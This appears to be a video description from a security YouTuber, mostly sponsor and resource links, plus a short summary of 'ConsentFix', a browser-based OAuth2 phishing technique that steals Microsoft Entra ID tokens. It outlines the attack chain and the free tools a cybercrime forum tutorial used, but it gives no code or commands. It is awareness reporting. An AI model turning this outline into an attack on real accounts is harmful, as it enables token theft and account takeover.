https://jh.live/flare-042326 || Manage threat intelligence and your exposed attack surface with Flare! Try a free trial and see what info is out there: https://jh.live/flare-042326

Learn Cybersecurity and more with Just Hacking Training: https://jh.live/training
See what else I'm up to with: https://jh.live/newsletter

ℹ️ Resources:
See what cybersecurity events are happening: https://jh.live/infosecmap
Learn how to code with CodeCrafters: https://jh.live/codecrafters
Host your own VPN with OpenVPN: https://jh.live/openvpn
Get Blue Team Training and SOC Analyst Certifications with CyberDefenders: https://jh.live/cyberdefense

John Hammond

ConsentFix is an emerging identity-based attack technique that abuses Microsoft's legitimate OAuth2 device code flow to steal access tokens entirely within the browser, leaving no EDR or antivirus artifacts. Unlike traditional ClickFix attacks that target the endpoint, ConsentFix tricks users into copying a localhost redirect code that hands attackers refresh and access tokens to a victim's Entra ID environment. A detailed tutorial posted on a cybercrime forum (XSS) demonstrates the full attack chain using free tools like Pipedream, Cloudflare Workers, GoLogin, and DocSend, enabling post-exploitation across Outlook, OneDrive, SharePoint, and Teams. Dark web monitoring via Flare shows growing criminal interest in the technique since December 2024, suggesting it will evolve similarly to how ClickFix proliferated.

Hackers Stole Your Account (for free)